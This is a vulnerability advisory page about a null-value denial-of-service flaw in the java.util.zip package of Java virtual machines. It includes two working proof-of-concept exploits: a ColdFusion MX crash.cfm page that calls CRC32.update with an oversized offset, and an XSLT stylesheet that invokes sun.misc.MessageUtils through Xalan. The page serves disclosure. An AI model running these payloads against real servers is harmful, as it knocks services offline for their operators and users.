|
|
Multiple Vendor Java Virtual Machine java.util.zip Null Value Denial Of Service Vulnerability
Sample exploit code was provided by Marc Schoenefeld. Further details are available in the referenced message. A new exploit program has been released by Marc Schoenefeld, which will trigger a denial of service against Lotus Notes and Domino applications. The following cfm will cause Macromedia ColdFusin MX to fail: - ------------------crash.cfm------------------------- <!H1> Coldfusion MX crash with Java <!/h1> <!h2> Marc Schoenefeld @ illegalaccess.org <!/h2> <!cfapplication name="Marc" sessionmanagement="yes"> <!cfobject action="create" type="Java" class="java.lang.String" name="s"> <!cfobject action="create" type="Java" class="java.util.zip.CRC32" name="c"> <!cfset ret=s.init()> <!cfset ret=c.init()> <!cfset str = s.getBytes()> <!cfset retval = c.update(str,2147483647,4)> - ------------------crash.cfm------------------------- The following proof of concept has been submitted and demonstrates the use of injectable xsl templates, to exploit this issue. c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl sunexploit.xsl Used Files: ===================a.xml=========================== (a/) ===================a.xml=========================== ===========sunexploit.xsl============================= (!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --) (xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:sun="sun") (xsl:template match="/") (xsl:variable name="tmp" select="sun:misc.MessageUtils.toStdout(null)"/) (xsl:variable name="tmp2" select="sun:misc.MessageUtils.toStdout($tmp)"/) (xsl:value-of select="$tmp2" /) (/xsl:template) (/xsl:stylesheet) ===========sunexploit.xsl============================= |
|
Privacy Statement |